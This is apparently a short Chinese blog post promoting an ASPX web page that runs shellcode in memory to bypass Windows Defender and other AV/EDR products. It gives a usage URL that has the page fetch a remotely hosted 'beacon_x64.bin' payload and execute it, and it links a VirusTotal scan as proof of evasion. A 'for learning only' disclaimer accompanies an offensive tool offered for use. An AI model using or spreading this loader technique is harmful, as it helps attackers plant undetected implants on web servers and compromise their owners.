ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
说明
- ASPX内存执行shellcode,绕过Windows Defender(AV/EDR),
- 这只是个代码例子,目的是为了学习
- 部分杀软(AV/EDR)可能需要你的Bin能够做到内存免杀
- 持续更新中,包括后续的JSP内存加载
使用
将shellcode远程托管到任意网站(URLB)
http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin
视频(开头有点糊)
Rec_2023-12-14_0001.2.mp4
VT效果: https://www.virustotal.com/gui/file/b016e15e7cf0d737580474703cbf351eec956b870c2ad39e43beb3fa6422d5e3?nocache=1
温馨提示:本文最后更新于2024年7月18日 18:31,若内容或图片失效,请在下方留言或联系博主。